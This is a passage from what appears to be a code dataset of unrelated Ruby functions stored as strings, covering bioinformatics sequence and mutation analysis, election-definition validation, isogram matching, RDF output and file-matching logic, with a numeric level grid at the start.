'color_339999-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000500000000000000_00000000000000000000000000000000000000000000000000000000000000000550000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000000000000000000000000000000000000000000000555000000000000_00000000000000000000000500000000000000000000000000000000000000000555000000000000_00000000000000000000000550000000000000000000000000000000000000000055000000000000_00000000000000000000000555000000000000000000000000000000000000000005000000000000_00000000000000000000000555000000000000000000000000000000000000000005000000000000_00000000000000000000000555000000000000000005000000000000000000000005000000000000_00050000000000000000000555000000000000000055000000000000000000000005000000000000_00055000000000000000000555000000000000000555000000000000000000000005000000000000_00055500000000000000000555000000000000000555000000000000000000000005000000000000_00055500000000000000000055000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000005000000000000_00055500000000000000000005000000000000000555000000000000000000000000000000000000_00055500000000000000000005000000000000000550000000000000000000000000000000000000_00005500000000000000000005000000000000000500000000000000050000000000000000000000_00000500000000000000000005000000000000000500000000000000550000000000000000000000_00000500000000000050000005000000005000000500000000000005550000000000000000000000_00000500000000000050000005500000055000000500000000000005550000000000000000000000_000005000000000000500000055500005550000005000
00000000005550000000000000000000000_00000500000000000050000005555005555000000500000000000005550000000000000000000000_00000500000000000010000055555005555500000500000000000005550000000000000000000000_00000500000000000010000055555005555500000100000000000005550000000000000000000000_00000500000000000010300055555005555500020100000000000005550000000000000000000000_00000000000000000011110055555005555500111100000000000005550000000000000000000000_00000000000000000015500055555005555500055100000000000005500000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000000000000015500055555005555500055100000000000005000000000000000000000000_00000000001111111115555555555005555555555100000000000005000000000000000000000000_00000000001555555555555555555005555555555100000000000005000000000000000000000000_00000000001000000000000055555005555500000100000000000005000000000000000000000000_00000000001000000000000005555005555000000100000000000005000000000000000000000000_00000000001000000000000000555005550000000100000000000005000000000000000000000000_00000000001004400000044000055005500000000100000000000005000000000000000000000000_00000000001001100000011000005005000000000100000000000005000000000000000000000000_00000000001001555555551000005000000000000100000000000005000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000001000500000050000005000000000000100000000000000000000000000000000000000_00000000005000500050000000005000000000000100000000000000000000000000000000000000_00000000005000500050000000015000000000000100000000000000000000000000000000000000_00000000005000500050000000015000000000000100000000000000000000000000000000000000_00000000000000500050000001115000000000000100000000000000000000000000000000000000_00000000000000500055555555555555555500055100000000000000000000000000000000000000_00000000000000500000000000000000000000000100000000000000000000000000000000000000_00000000100000510000000000000000000000000100000000000000000000000000000000000000_00000000100000510044400000000000000000000100000000000000000000000000000000000000_00001111100000511111111000000000000000000100000000000000000000000000000000000000_00001000000000555555551000000000000000000100000000000000000000000000000000000000_00001000000000000000551000000000000000000100000000000000000000000000000000000000_00001000000000000000551000000000000000000100000000000000000000000000000000000000',\n skill_mean: 47,\n )\n ]\nend",
"def uniq_sequence(seq = {}, sequence_name = \"sequence\")\n uni = count(seq.values)\n new_seq = {}\n n = 1\n uni.each do |s,c|\n name = \">\" + sequence_name + \"_\" + n.to_s + \"_\" + c.to_s\n new_seq[name] = s\n n += 1\n end\n return new_seq\nend",
"def compute_index \n self.rewind\n r = %r{\\<scan\\snum\\=\\\"(\\d+)\\\"|\\<spectrum\\sid\\=\\\"(\\d+)\\\"}\n index = {}\n while (!self.eof) \n pos = self.pos\n if (r.match(self.readline)) then \n m = $1 ? $1 : $2\n index[m.to_i] = pos\n end\n end\n index\n end",
"def validate_expected_counts(expected_counts)\n exp_cids = []\n exp_rgs = []\n exp_pids = []\n expected_counts.each do |ecount|\n cid = ecount[\"counter_ident\"].to_s\n exp_cids.push(cid) unless exp_cids.include?(cid)\n rg = ecount[\"reporting_group\"].to_s\n exp_rgs.push(rg) unless exp_rgs.include?(rg)\n val_err(\"Non-Existent Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"counter\", cid)\n val_err(\"Non-Existent Reporting Group\", rg, \"for Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"reporting group\",rg)\n ecount[\"precinct_ident_list\"].each do |pid|\n pid = pid.to_s\n exp_pids.push(pid) unless exp_pids.include?(pid)\n val_err(\"Non-Existent Precinct UID\", pid, \"for Counter UID\", cid, \"in Expected Count\") unless\n uid_exists?(\"precinct\", pid)\n if (self.counts_expected.include?([cid, rg, pid]))\n val_warn(\"Duplicate Expected Count\", \"#{cid}, #{rg}, #{pid}\", \"in Election Definition\")\n else\n self.counts_expected.push([cid, rg, pid])\n end\n end\n end\n diff_cids = (self.uids[\"counter\"] - exp_cids)\n val_warn(\"Missing Counter UIDs\", diff_cids, \"from Expected Counts\") unless\n (diff_cids.length == 0)\n diff_rgs = (self.uids[\"reporting group\"] - exp_rgs)\n val_warn(\"Missing Reporting Groups\", diff_rgs, \"from Expected Counts\") unless\n (diff_rgs.length == 0)\n diff_pids = (self.uids[\"precinct\"] - exp_pids)\n val_warn(\"Missing Precinct UIDs\", diff_pids, \"from Expected Counts\") unless\n (diff_pids.length == 0)\n end",
"def experimental_media_hash_matrix(inducer_mat, experimental_antibiotic_mat)\n media_hash = Hash.new(0)\n experimental_media_matrix = [] # Combines antibiotic and inducer media strings to create a matrix that combines both medias\n inducer_mat.each_with_index do |row, r_idx|\n mat_row = []\n row.each_with_index do |col, c_idx|\n if col != \"-1\"\n media = experimental_antibiotic_mat[r_idx][c_idx] + \"_\" + col\n mat_row.push(media)\n if !media_hash.include? media\n media_hash[media] = 1\n else\n media_hash[media] += 1\n end\n end\n end\n experimental_media_matrix.push(mat_row)\n end\n return media_hash, experimental_media_matrix \n end",
"def isogram_matcher(isogram1, isogram2)\n \n # get common, get match in same position\n # position\n positions = 0\n i = 0\n while i < isogram1.length\n if isogram1[i] == isogram2[i]\n positions += 1\n end\n i += 1\n end\n \n # common\n common = (isogram1.split(\"\") & isogram2.split(\"\")).length\n common = common - positions\n \n [positions, common]\n \nend",
"def remove_errant_matches_from(pot_ex_array)\n correct_match_arr = []\n pot_ex_array.each do |example|\n constituents = example.construct_constituents_array\n constituents.each do |const_array|\n if const_array[0] == self.word && const_array[1] == self.hiragana && const_array[3] == self.reading # For this to work, the constituents have to be normalized to dictionary_forms.\n correct_match_arr << example\n end\n end\n end\n return correct_match_arr\n end",
"def check_correspondence(header)\n\t\terr = \"\"\n\t\tif(header.length > @map.length)\n\t\t\traise \"inconsistent between header and mapping\"\n\t\tend\n\t\t\n\t\tidx = 0\n\t\t@map.each_key do |key|\n\t\t\tif(idx == header.length-1) \n\t\t\t\tbreak\n\t\t\telsif(header[idx].eql?(key))\n\t\t\t\tidx+=1\n\t\t\tend\n\t\tend\n\t\tif(idx < header.length - 1)\n\t\t\traise \"inconsistent between header and mapping_\"\n\t\tend\n\t\t\n\t#\tputs header\n\t#\tputs @map\n\t#\tputs \"IDX=\"+idx.to_s\t\n\tend",
"def remove_invalid_references\n addresses = self.addresses.to_set\n missing = Set.new\n result = map do |r|\n common = (addresses & r['references'])\n if common.size != r['references'].size\n missing.merge(r['references'] - common)\n end\n r = r.dup\n r['references'] = common\n r\n end\n return result, missing\n end",
"def validate_no_repeating_measure_population_ids(data = {})\n no_duplicate_measures = true\n doc_population_ids = @doc.xpath(measure_population_selector).map(&:value).map(&:upcase).sort\n duplicates = doc_population_ids.group_by { |e| e }.select { |_k, v| v.size > 1 }.map(&:first)\n duplicates.each do |duplicate|\n begin\n measure_id = @doc.xpath(find_measure_node_for_population(duplicate)).at_xpath(\"cda:reference/cda:externalDocument/cda:id[./@root='2.16.840.1.113883.4.738']/@extension\")\n @errors << build_error(\"Population #{duplicate} for Measure #{measure_id.value} reported more than once\", '/', data[:file_name])\n rescue\n @errors << build_error(\"Population #{duplicate} for reported more than once\", '/', data[:file_name])\n end\n no_duplicate_measures = false\n end\n no_duplicate_measures\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def each_match(hash)\n line[:type, :all].count.times do |i|\n next unless hash.all? { |k, v| line[k, :all][i] == v }\n yield(\n :type => line[:type, :all][i],\n :ssn => line[:ssn, :all][i],\n :ein => line[:ein, :all][i],\n :amount => line[:amount, :all][i]\n )\n end\n end",
"def output_idmap(refseq_data, up)\n taxid = refseq_data[:taxid]\n gene_label_url = URI.escape(refseq_data[:gene_label])\n up = up.split(\"-\").first if up.index(\"-\") # with \"-\" means isoform's ID. expect to protein's ID\n\n unless $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"]\n $output_ttl.puts triple(\"<http://togogenome.org/gene/#{taxid}:#{gene_label_url}>\", \"rdfs:seeAlso\", \"upid:#{up}\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdf:type\", \"<http://identifiers.org/uniprot>\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"up:#{up}\")\n $output_ttl.puts triple(\"up:#{up}\", \"dct:publisher\", \"<http://identifirs.org/miriam.resource/MIR:00100134>\") # UniProt (www.uniprot.org)\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"tax:#{taxid}\")\n $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"] = true # to prevent duplicate output\n $taxid_list[taxid] = true\n end\nend",
"def find_different weights\n counts = Hash.new 0\n weights.each do |x|\n counts[x] += 1\n end\n k, _ = counts.rassoc 1\n k\nend",
"def uniqueSequences file\n\n seqIDs = {}\n printSeq = 1\n File.open(file,\"r\") do |f|\n while l = f.gets\n if l[0] == \">\"\n key = l.split(\"\\n\")[0].split(\" \")[0]\n if seqIDs.has_key? key\n printSeq = 0\n else\n seqIDs[\"#{key}\"] = 0\n printSeq = 1\n puts l\n end\n elsif printSeq == 1\n puts l\n end\n end\n end\n\n end",
"def match_errors(errors, doc)\n error_map = {}\n error_id = 0\n @error_attributes = []\n locs = errors.collect{|e| e.location}\n locs.compact!\n\n locs.each do |location|\n node = REXML::XPath.first(doc ,location)\n if(node)\n elem = node\n if node.class == REXML::Attribute\n @error_attributes << node\n elem = node.element\n end\n if elem\n unless elem.attributes['error_id']\n elem.add_attribute('error_id',\"#{error_id}\") \n error_id += 1\n end\n error_map[location] = elem.attributes['error_id']\n end\n end\n end\n\n error_map\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? 
header.size : header.find_index(next_protocol)\n header.insert(i, geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end",
"def motif_enumeration(dna, k, d)\n # Given a collection of strings Dna and an integer d, a k-mer is a (k,d)-motif if it appears \n # in every string from Dna with at most d mismatches. For example, the implanted 15-mer in the \n # strings above represents a (15,4)-motif.\n\n # Implanted Motif Problem: Find all (k, d)-motifs in a collection of strings.\n # Input: A collection of strings Dna, and integers k and d.\n # Output: All (k, d)-motifs in Dna.\n\n # MOTIFENUMERATION(Dna, k, d)\n # Patterns ← an empty set\n # for each k-mer Pattern in Dna\n # for each k-mer Pattern’ differing from Pattern by at most d\n # mismatches\n # if Pattern' appears in each string from Dna with at most d\n # mismatches\n # add Pattern' to Patterns\n # remove duplicates from Patterns\n # return Patterns \n\n patterns = []\n (0..(dna[0].length-k)).each do |i|\n kmer = dna[0].slice(i,k)\n # puts \"kmer:\" + kmer\n iterative_neighbors(kmer, d).each do |pattern1|\n # puts \"Pattern1: \" + pattern1\n present_in_all = 1\n (1..(dna.length-1)).each do |j|\n # puts \"#{j}:\" + approx_pattern_matching(pattern1, dna[j], d).join(\" \")\n # puts \"#{j}:\" + approx_pattern_matching(pattern1, dna[j], d).length.to_s\n present_in_all = 0 if approx_pattern_matching(pattern1, dna[j], d).length == 0\n end\n if present_in_all == 1\n patterns << pattern1 unless patterns.include?(pattern1)\n end\n end\n end\n\n return patterns\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def ensure_adjacent_rooms(map)\n map.each do |row|\n x_coordinate = map.index(row)\n row.each do |room|\n index = map[row].index(room)\n puts index\n end\n\n \n # x_coordinates = row.collect! { |room| room = row.index(room) }\n \n # x_coordinates.each { |coordin| puts coordin } \n # \n # row.each { |coordin| puts coordin } \n end\nend",
"def find_uniqueness_constraints mapping\n return [] unless mapping.object_type.is_a?(MM::EntityType)\n\n start_roles =\n mapping.\n object_type.\n all_role. # Includes objectification roles for objectified fact types\n select do |role|\n (role.is_unique || # Must be unique on near role\n role.fact_type.is_unary) && # Or be a unary role\n (!role.fact_type.is_a?(MM::TypeInheritance) || included_subtype(role))\n end.\n map(&:counterpart). # (Same role if it's a unary)\n compact. # Ignore nil counterpart of a role in an n-ary\n map(&:base_role). # In case it's a link fact type\n uniq\n\n pcs =\n start_roles.\n flat_map(&:all_role_ref). # All role_refs\n map(&:role_sequence). # The role_sequence\n uniq.\n flat_map(&:all_presence_constraint).\n uniq.\n reject do |pc|\n pc.max_frequency != 1 || # Must be unique\n pc.enforcement || # and alethic\n pc.role_sequence.all_role_ref.detect do |rr|\n !start_roles.include?(rr.role) # and span only valid roles\n end || # and not be the full absorption path\n ( # Reject a constraint that caused full absorption\n pc.role_sequence.all_role_ref.size == 1 and\n mapping.is_a?(MM::Absorption) and\n fa = mapping.full_absorption and\n fa.mapping.is_a?(MM::Absorption) and\n pc.role_sequence.all_role_ref.single.role.base_role == fa.mapping.parent_role.base_role\n )\n end # Alethic uniqueness constraint on far end\n\n non_absorption_pcs = pcs.reject do |pc|\n # An absorption PC is a PC that covers some role that is involved in a FullAbsorption\n full_absorptions =\n pc.\n role_sequence.\n all_role_ref.\n map(&:role).\n flat_map do |role|\n (role.all_absorption_as_parent_role.to_a + role.all_absorption_as_child_role.to_a).\n select do |abs|\n abs.full_absorption && abs.full_absorption.composition == @composition\n end\n end\n full_absorptions.size > 0\n end\n pcs = non_absorption_pcs\n\n trace :relational_paths, \"Uniqueness Constraints for #{mapping.name}\" do\n pcs.each do |pc|\n trace :relational_paths, \"#{pc.describe.inspect}#{pc.is_preferred_identifier ? ' (PI)' : ''}\"\n end\n end\n\n pcs\n end",
"def isogram_matcher(isogram1, isogram2)\n #number of letters matched @ same position\n #iterate through the string, if element in isogram1 == element in isogram 2, increase letter match\n #number of leters matched\n #chars isogram1 and iterate through array\n #if element in isogram1 is in isogram2, increase count\n # return letters matched at same position and numbers matched in array\n\n idx_match = 0\n letter_match = 0\n\n isogram1.chars.each_with_index do |letter, idx|\n if letter == isogram2[idx]\n idx_match += 1\n elsif isogram2.include?(letter)\n letter_match += 1\n end\n end\n\n [idx_match, letter_match]\n\nend",
"def beUniqify\n\t\tres = Solver::Solver.uniqify(@indicesLigne,@indicesColonne)\n\t\t@indicesLigne = res[0]\n\t\t@indicesColonne = res[1]\n\t\t@grade = res[2]\n\tend",
"def mark_validly_repeated_pages\n\n fids = {}\n @sequence.each do |entry|\n next unless is_page? entry\n fids[entry.fid] ||= []\n fids[entry.fid].push entry\n end\n\n fids.keys.each do |k|\n if fids[k].length > 1\n fids[k][0..-2].each { |e| e.valid_repeat = true } # don't mark the last one, it's the one we will eventually include in the sequence to ingest\n end\n end\n\n image_filenames = {}\n @sequence.each do |entry|\n next unless is_page? entry\n image_filenames[entry.image_filename] ||= []\n image_filenames[entry.image_filename].push entry\n end\n\n image_filenames.keys.each do |k|\n if image_filenames[k].length > 1\n image_filenames[k][0..-2].each { |e| e.valid_repeat = true } # don't mark the last one, it's the one we will eventually include in the sequence to ingest\n end\n end\n end",
"def initialize(matching_index, pointer)\n # Matching files with other indexes than CRC\n # map< ( file_info | segment_info ), matching_pointer_info >\n # map< ( FileInfo | SegmentInfo ), MatchingIndexSinglePointer >\n @matching_files = {}\n @crc_matching_files = {}\n @score_max = compute_score_max(pointer)\n # First find CRC matching files\n if (matching_index.indexes.has_key?(:crc))\n matching_index.indexes[:crc].each do |data, lst_pointers|\n @crc_matching_files.concat(lst_pointers)\n end\n end\n # Then all other indexes\n matching_index.indexes.each do |index_name, index_data|\n if (index_name != :crc)\n index_data.each do |data, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFFS[index_name]\n @matching_files[matching_pointer].indexes[index_name] = [] if (!@matching_files[matching_pointer].indexes.has_key?(index_name))\n @matching_files[matching_pointer].indexes[index_name] << data\n end\n end\n end\n end\n end\n matching_index.segments_metadata.each do |segment_ext, segment_ext_data|\n segment_ext_data.each do |metadata_key, metadata_data|\n metadata_data.each do |metadata_value, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFF_SEGMENT_METADATA\n @matching_files[matching_pointer].segments_metadata[segment_ext] = {} if (!@matching_files[matching_pointer].segments_metadata.has_key?(segment_ext))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] = [] if (!@matching_files[matching_pointer].segments_metadata[segment_ext].has_key?(metadata_key))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] << metadata_value\n end\n end\n end\n end\n end\n # Find matching blocks' CRC sequences\n lst_crc = (pointer.is_a?(FileInfo) ? pointer.crc_list : pointer.segment.crc_list)\n @matching_files.each do |matching_pointer, matching_info|\n if (matching_info.indexes.has_key?(:block_crc))\n lst_common_crc = matching_info.indexes[:block_crc]\n # Get the list of blocks' CRC from the file\n lst_matching_crc = (matching_pointer.is_a?(FileInfo) ? 
matching_pointer.crc_list : matching_pointer.segment.crc_list)\n # Parse the original file and get to a matching CRC\n idx_crc = 0\n while (idx_crc < lst_crc.size)\n while ((idx_crc < lst_crc.size) and\n (!lst_common_crc.include?(lst_crc[idx_crc])))\n idx_crc += 1\n end\n if (idx_crc < lst_crc.size)\n first_crc = lst_crc[idx_crc]\n # We are at the beginning of a sequence in the original file.\n smallest_sequence_size = lst_crc.size - idx_crc\n # Find all the occurences of this sequence in the matching file.\n lst_matching_crc.each_with_index do |matching_crc, idx_matching_crc|\n if (matching_crc == first_crc)\n # We are at the beginning of a sequence in the matching file\n idx_sequence = 1\n # Get the matching sequence\n matching_sequence = [first_crc]\n while ((idx_crc+idx_sequence < lst_crc.size) and\n (idx_matching_crc+idx_sequence < lst_matching_crc.size) and\n (lst_crc[idx_crc+idx_sequence] == lst_matching_crc[idx_matching_crc+idx_sequence]))\n matching_sequence << lst_crc[idx_crc+idx_sequence]\n idx_sequence += 1\n end\n if (matching_sequence.size > 1)\n # There is a matching sequence\n offset = idx_crc*FileInfo::CRC_BLOCK_SIZE\n matching_info.block_crc_sequences[offset] = {} if (!matching_info.block_crc_sequences.has_key?(offset))\n matching_info.block_crc_sequences[offset][idx_matching_crc*FileInfo::CRC_BLOCK_SIZE] = matching_sequence\n smallest_sequence_size = matching_sequence.size if (matching_sequence.size < smallest_sequence_size)\n # For each successful sequence, increase the score\n matching_info.score += (COEFF_BLOCK_CRC_SEQUENCE * matching_sequence.size)\n end\n end\n end\n idx_crc += smallest_sequence_size\n end\n end\n end\n end\n end",
"def sdrm_nrti(aa_array,start_aa=1)\n out_hash = {}\n sdrm = {}\n sdrm[41] = ['M',['L']]\n sdrm[65] = ['K',['R']]\n sdrm[67] = ['D',['N','G','E']]\n sdrm[69] = ['T',['D']]\n sdrm[70] = ['K',['R','E']]\n sdrm[74] = ['L',['V','I']]\n sdrm[75] = ['V',['M','T','A','S']]\n sdrm[77] = ['F',['L']]\n sdrm[115] = ['Y',['F']]\n sdrm[116] = ['F',['Y']]\n sdrm[151] = ['Q',['M']]\n sdrm[184] = ['M',['V','I']]\n sdrm[210] = ['L',['W']]\n sdrm[215] = [\"T\",[\"Y\",\"F\",\"I\",\"C\",\"D\",\"V\",\"E\",\"S\"]]\n sdrm[219] = [\"K\",[\"Q\",\"E\",\"N\",\"R\"]]\n aa_length = aa_array.size\n end_aa = start_aa + aa_length - 1\n (start_aa..end_aa).each do |position|\n array_position = position - start_aa\n if sdrm.keys.include?(position)\n wt_aa = sdrm[position][0]\n test_aa = aa_array[array_position]\n if test_aa.size == 1\n unless wt_aa == test_aa\n if sdrm[position][1].include?(test_aa)\n out_hash[position] = [wt_aa,test_aa]\n end\n end\n else\n test_aa_array = test_aa.split(\"/\")\n if (test_aa_array & sdrm[position][1])\n out_hash[position] = [wt_aa,test_aa]\n end\n end\n\n end\n end\n return out_hash\nend",
"def uniq_index\n\t\t\t\tcreate_property :in, type: :link, linked_class: :V\n\t\t\t\tcreate_property :out, type: :link, linked_class: :V\n\t\t\t\tcreate_index \"#{ref_name}_idx\", on: [ :in, :out ]\n\t\t\tend",
"def pick_patients\n $genes = Hash.new {|hash, key| hash[key] = Set.new() }\n $hide_pat = Hash.new {|hash, key| hash[key] = Set.new() }\n $avail_pat = Hash.new {|hash, key| hash[key] = Set.new() }\n\n pick_pat = Set.new($all_avail_pat.keys.sample(($HIDE_PERCENT*$all_avail_pat.size).to_i))\n $all_avail_pat.each_key do |pat|\n if pick_pat.include? pat\n $hide_pat[pat] = $all_avail_pat[pat]\n else\n $avail_pat[pat] = $all_avail_pat[pat]\n $avail_pat[pat].each { |gene| $genes[gene] << pat }\n end\n end\nend",
"def check_for_uncommon_properties(error_array, property_hash)\n rarity_factor_cutoff = 5\n property_type_count = property_hash.keys().length()\n total_property_count = 0\n property_hash.keys().each do |key|\n total_property_count += property_hash[key].length()\n end\n property_hash.keys().each do |key|\n if property_hash[key].length() < (total_property_count / property_type_count) / rarity_factor_cutoff \n property_hash[key].each do |line|\n error_array.push(line)\n end\n end\n end\nend",
